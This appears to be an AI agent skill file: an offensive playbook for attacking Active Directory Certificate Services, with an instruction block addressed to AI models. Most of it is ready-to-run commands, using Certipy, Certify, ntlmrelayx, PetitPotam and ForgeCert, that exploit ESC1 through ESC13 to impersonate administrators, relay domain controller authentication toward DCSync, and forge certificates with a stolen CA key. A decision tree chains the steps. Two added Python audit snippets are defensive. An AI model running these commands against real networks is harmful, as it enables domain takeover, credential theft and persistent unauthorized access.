active-directory-certificate-services


SKILL: AD CS Attack Playbook — Expert Guide

AI LOAD INSTRUCTION: Expert AD CS (Active Directory Certificate Services) attack techniques. Covers ESC1 through ESC13, certificate-based persistence, NTLM relay to enrollment endpoints, and CA misconfigurations. Base models miss enrollment prerequisite chains and ESC condition combinations.

0. RELATED ROUTING

Before going deep, consider loading:
  • active-directory-acl-abuse for ACL-based attacks that enable ESC4 (template modification)
  • active-directory-kerberos-attacks for Kerberos techniques after obtaining certificates
  • ntlm-relay-coercion for ESC8 (relay to HTTP enrollment endpoint)
  • windows-lateral-movement for using obtained certificates for lateral movement

Advanced Reference

Also load ADCS_ESC_MATRIX.md when you need:
  • ESC1–ESC13 quick reference table with conditions, impact, and tool commands
  • One-liner exploitation commands per ESC variant
  • Detection indicators per technique

1. AD CS ARCHITECTURE OVERVIEW

Certificate Authority (CA)
├── Enterprise CA (AD-integrated, issues certs based on templates)
│   ├── Certificate Templates (define who can enroll, what EKUs, subject settings)
│   ├── Enrollment endpoints: HTTP (certsrv), RPC, DCOM
│   └── Published in AD: CN=Public Key Services,CN=Services,CN=Configuration
├── Template Key Settings:
│   ├── Subject Alternative Name (SAN): who the cert represents
│   ├── Extended Key Usage (EKU): what the cert allows
│   ├── Enrollment permissions: who can request
│   └── Issuance requirements: manager approval, authorized signatures
└── Certificate → Kerberos Auth Flow:
    User presents cert → PKINIT → KDC verifies → issues TGT

2. ENUMERATION

```bash
# Certipy (recommended — comprehensive)
certipy find -u user@domain.com -p password -dc-ip DC_IP -stdout
certipy find -u user@domain.com -p password -dc-ip DC_IP -vulnerable -stdout

# Certify (from Windows)
Certify.exe find
Certify.exe find /vulnerable
Certify.exe cas   # Enumerate CAs

# Manual LDAP query for templates
ldapsearch -H ldap://DC_IP -D "user@domain.com" -w password \
  -b "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" \
  "(objectClass=pKICertificateTemplate)" cn msPKI-Certificate-Name-Flag pKIExtendedKeyUsage
```

---

3. ESC1 — ENROLLEE SUPPLIES SUBJECT

Condition: Template allows enrollee to specify Subject Alternative Name (SAN) + client authentication EKU + low-privilege enrollment.

```bash
# Certipy
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template VulnTemplate -upn administrator@domain.com

# Certify (Windows)
Certify.exe request /ca:CA-NAME /template:VulnTemplate /altname:administrator

# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip DC_IP
# → NT hash of administrator
```

---

4. ESC2 — ANY PURPOSE EKU

Condition: Template has "Any Purpose" EKU or no EKU (subordinate CA cert) + low-privilege enrollment.

```bash
# Same as ESC1 exploitation
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template AnyPurposeTemplate -upn administrator@domain.com
```

---
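
As an added audit example (not code from this playbook or from Certipy), the function below evaluates the ESC1 and ESC2 condition chain of §3 and §4 on a template's LDAP attributes as returned by the §2 query, also requiring that issuance is not gated by manager approval or authorized signatures, and accepting the CA-wide SAN flag of §7 as an alternative source of SAN control. The low-privilege principal set, the EKU list and the sample templates are assumptions constructed for the demonstration.

```python
from dataclasses import dataclass, field

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag (manager approval)
OID_ANY_PURPOSE = "2.5.29.37.0"
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    OID_ANY_PURPOSE,           # Any Purpose also satisfies client auth
}
# Assumed low-privilege principals; a real audit resolves the template's Enroll
# ACEs from nTSecurityDescriptor before comparing against this set.
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

@dataclass
class Template:
    name: str
    name_flag: int                                       # msPKI-Certificate-Name-Flag
    enrollment_flag: int                                 # msPKI-Enrollment-Flag
    ra_signatures: int                                   # msPKI-RA-Signature
    ekus: list = field(default_factory=list)             # pKIExtendedKeyUsage
    enroll_principals: set = field(default_factory=set)  # principals holding Enroll

def assess(t: Template, ca_san_flag: bool = False) -> list:
    """ESC labels whose full chain holds; ca_san_flag marks EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA."""
    # Prerequisite chain: low-priv can enroll and issuance is not gated.
    low_priv_enroll = bool(t.enroll_principals & LOW_PRIV)
    no_approval = not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS)
    if not (low_priv_enroll and no_approval and t.ra_signatures == 0):
        return []
    findings = []
    template_san = bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    allows_auth = not t.ekus or any(e in CLIENT_AUTH_EKUS for e in t.ekus)
    if allows_auth and template_san:
        findings.append("ESC1")
    elif allows_auth and ca_san_flag:
        findings.append("ESC6")  # SAN control comes from the CA flag, not the template
    if not t.ekus or OID_ANY_PURPOSE in t.ekus:
        findings.append("ESC2")
    return findings

# Constructed sample templates, not real enumeration output.
SAMPLES = [
    Template("VulnTemplate", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], {"Domain Users"}),
    Template("GatedTemplate", 0x1, CT_FLAG_PEND_ALL_REQUESTS, 0, ["1.3.6.1.5.5.7.3.2"], {"Domain Users"}),
    Template("AnyPurposeTemplate", 0x0, 0x0, 0, [OID_ANY_PURPOSE], {"Domain Users"}),
]

def audit(templates=SAMPLES, ca_san_flag: bool = False) -> dict:
    """Map template name to its findings, omitting templates with none."""
    return {t.name: f for t in templates if (f := assess(t, ca_san_flag))}
```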

5. ESC3 — ENROLLMENT AGENT

Condition: Template allows enrollment agent certificate + another template allows enrollment on behalf of others.

```bash
# Step 1: Request enrollment agent cert
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template EnrollmentAgent

# Step 2: Use enrollment agent cert to request on behalf of admin
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template UserTemplate -on-behalf-of 'DOMAIN\administrator' -pfx enrollmentagent.pfx

# Authenticate
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```

---

6. ESC4 — TEMPLATE ACL MISCONFIGURATION

Condition: Low-privilege user has write access to the certificate template object.

```bash
# Modify template to become ESC1 vulnerable (using Certipy)
certipy template -u user@domain.com -p password -template VulnTemplate \
  -save-old -dc-ip DC_IP

# Template is now ESC1 → exploit as ESC1
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template VulnTemplate -upn administrator@domain.com

# Restore original template (cleanup)
certipy template -u user@domain.com -p password -template VulnTemplate \
  -configuration old_config.json -dc-ip DC_IP
```

---

7. ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2

Condition: CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled → any template becomes ESC1.

```bash
# Check if flag is set
certutil -config "CA_HOST\CA-NAME" -getreg policy\EditFlags

# Exploit: request any template with SAN
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template User -upn administrator@domain.com
```

---

8. ESC7 — CA OFFICER / MANAGER PERMISSIONS

Condition: User has ManageCA or ManageCertificates permission on the CA.

```bash
# With ManageCA: enable SubCA template (always allows SAN)
certipy ca -u user@domain.com -p password -ca CA-NAME -dc-ip DC_IP \
  -enable-template SubCA

# Request SubCA cert with admin SAN (will be denied — "pending"); the returned request ID is REQUEST_ID below
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -template SubCA -upn administrator@domain.com

# With ManageCertificates: approve the pending request
certipy ca -u user@domain.com -p password -ca CA-NAME -dc-ip DC_IP \
  -issue-request REQUEST_ID

# Retrieve the issued certificate
certipy req -u user@domain.com -p password -ca CA-NAME -target CA_HOST \
  -retrieve REQUEST_ID
```

---

9. ESC8 — NTLM RELAY TO HTTP ENROLLMENT

Condition: CA has an HTTP enrollment endpoint (certsrv) without HTTPS enforcement.

```bash
# Setup relay to enrollment endpoint
ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Coerce DC authentication (PetitPotam, PrinterBug, etc.)
PetitPotam.py RELAY_HOST DC01.domain.com
# DC authenticates → relay → certificate issued for DC01$

# Authenticate with certificate
certipy auth -pfx dc01.pfx -dc-ip DC_IP
# → DC01$ hash → DCSync
```

---

10. ESC9-ESC13 — NEWER DISCOVERIES

ESC9: No Security Extension (StrongCertificateBindingEnforcement = 0/1)

Weak certificate mapping allows impersonation when CT_FLAG_NO_SECURITY_EXTENSION is set on the template.

```bash
# Change victim's UPN to admin, request cert, change back
certipy shadow auto -u attacker@domain.com -p pass -account victim -dc-ip DC_IP
```

ESC10: Weak Certificate Mapping (Registry-based)

Similar to ESC9 but exploits the CertificateMappingMethods registry value on the DC.

ESC11: NTLM Relay to RPC Enrollment

Relay NTLM to the CA's RPC interface (IF_ENFORCEENCRYPTICERTREQUEST not set).

```bash
ntlmrelayx.py -t "rpc://CA_HOST" -rpc-mode ICPR -icpr-ca-name "CA-NAME" \
  -smb2support --adcs --template DomainController
```

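An added audit example (not from the playbook or Certipy) that parses the output of the ESC6 check in §7 (`certutil -getreg policy\EditFlags`) and the matching `certutil -getreg CA\InterfaceFlags` check for this ESC11 condition, and reports whether each flag is in its weak state. The sample outputs are constructed, and the parser assumes certutil's `Name REG_DWORD = hex (dec)` line format.

```python
import re

# Registry bitmask values behind the two certutil -getreg checks.
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000  # policy\EditFlags: ESC6 when set
IF_ENFORCEENCRYPTICERTREQUEST = 0x00000200   # CA\InterfaceFlags: ESC11 when clear

# Constructed sample, shaped like `certutil -config "CA_HOST\CA-NAME" -getreg policy\EditFlags`.
SAMPLE_EDITFLAGS = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 140002 (1310722)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLEREQUESTEXTENSIONS -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""

# Constructed sample, shaped like `certutil -config "CA_HOST\CA-NAME" -getreg CA\InterfaceFlags`.
SAMPLE_INTERFACEFLAGS = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA-NAME:

  InterfaceFlags REG_DWORD = 641 (1601)
    IF_LOCKICERTREQUEST -- 1
    IF_NOREMOTEICERTADMINBACKUP -- 40 (64)
    IF_ENFORCEENCRYPTICERTREQUEST -- 200 (512)
    IF_ENABLEADMINASAUDITOR -- 400 (1024)
CertUtil: -getreg command completed successfully.
"""

def parse_dword(output: str, value_name: str) -> int:
    """Extract the hex REG_DWORD named value_name from certutil -getreg output."""
    m = re.search(rf"^\s*{re.escape(value_name)}\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)", output, re.M)
    if not m:
        raise ValueError(f"{value_name} not found in certutil output")
    return int(m.group(1), 16)

def audit_ca_flags(editflags_output: str, interfaceflags_output: str) -> dict:
    """Return each ESC condition with True when the CA output shows it present."""
    edit = parse_dword(editflags_output, "EditFlags")
    iface = parse_dword(interfaceflags_output, "InterfaceFlags")
    return {
        "ESC6_EDITF_ATTRIBUTESUBJECTALTNAME2_set": bool(edit & EDITF_ATTRIBUTESUBJECTALTNAME2),
        "ESC11_IF_ENFORCEENCRYPTICERTREQUEST_missing": not (iface & IF_ENFORCEENCRYPTICERTREQUEST),
    }

if __name__ == "__main__":
    for finding, present in audit_ca_flags(SAMPLE_EDITFLAGS, SAMPLE_INTERFACEFLAGS).items():
        print(f"{finding}: {'FINDING' if present else 'ok'}")
```
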
ESC13: OID Group Link (Issuance Policy)

Template's issuance policy OID is linked to a group → the certificate grants that group's membership.

```bash
certipy req -u user@domain.com -p pass -ca CA-NAME -target CA_HOST \
  -template ESC13Template
# Certificate grants membership in linked group
```

---

11. CERTIFICATE-BASED PERSISTENCE

Golden Certificate

With the CA private key → forge any certificate.

```bash
# Extract CA private key (requires admin on CA server)
certipy ca -backup -u admin@domain.com -p password -ca CA-NAME -target CA_HOST

# Forge certificate for any user
certipy forge -ca-pfx ca.pfx -upn administrator@domain.com -subject "CN=Administrator,CN=Users,DC=domain,DC=com"

# Authenticate with forged cert
certipy auth -pfx forged.pfx -dc-ip DC_IP
```

**Persistence**: Valid until the CA certificate expires or the CA private key is rotated.

ForgeCert (Windows)

```cmd
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "pass" --Subject "CN=User" ^
  --SubjectAltName "administrator@domain.com" --NewCertPath forged.pfx --NewCertPassword "pass"
```

12. AD CS ATTACK DECISION TREE

Targeting AD CS
├── Enumerate: certipy find -vulnerable
├── Vulnerable template found?
│   ├── Enrollee can set SAN + Client Auth EKU?
│   │   └── ESC1 → request cert with admin UPN (§3)
│   ├── Any Purpose EKU?
│   │   └── ESC2 → same as ESC1 (§4)
│   ├── Enrollment Agent template available?
│   │   └── ESC3 → enroll as agent, then on-behalf-of (§5)
│   └── OID group link in issuance policy?
│       └── ESC13 → request cert for group membership (§10)
├── Write access to template?
│   └── ESC4 → modify template to ESC1 condition (§6)
├── CA misconfiguration?
│   ├── EDITF_ATTRIBUTESUBJECTALTNAME2 flag?
│   │   └── ESC6 → any template becomes ESC1 (§7)
│   ├── ManageCA / ManageCertificates permission?
│   │   └── ESC7 → enable SubCA template, approve requests (§8)
│   └── HTTP enrollment without HTTPS?
│       └── ESC8 → NTLM relay to certsrv (§9)
├── Weak certificate mapping on DC?
│   ├── StrongCertificateBindingEnforcement < 2?
│   │   └── ESC9 → UPN manipulation + cert request (§10)
│   └── CertificateMappingMethods misconfigured?
│       └── ESC10 → similar UPN abuse (§10)
├── RPC enrollment without encryption?
│   └── ESC11 → NTLM relay to RPC (§10)
└── Already CA admin?
    └── Golden certificate for persistence (§11)